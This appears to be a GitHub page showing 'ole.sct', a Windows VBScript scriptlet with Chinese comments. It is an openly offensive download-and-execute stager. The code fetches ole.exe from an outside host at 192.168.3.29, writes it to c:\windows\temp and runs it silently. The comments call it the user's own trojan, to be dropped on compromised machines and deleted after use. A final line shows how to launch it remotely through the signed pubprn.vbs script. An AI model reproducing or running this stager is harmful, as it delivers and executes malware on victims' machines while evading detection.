-
Notifications
You must be signed in to change notification settings - Fork 74
/
Copy pathole.sct
32 lines (30 loc) · 1.06 KB
/
ole.sct
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="VBScript">
<![CDATA[
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
http.open "GET","http://192.168.3.29/ole.exe",False 利用本地webDAV来变向发起http请求,自己马的url,实战中直接丢到肉鸡上,记得用完以后及时删掉
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\windows\temp\ole.exe" 保存到目标机器上的路径
ado.Close
CreateObject("WScript.Shell").Run "c:\windows\temp\ole.exe",0,true 执行马
]]>
</script>
</scriptlet>
远程加载执行自己的马, cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.3.29/ole.sct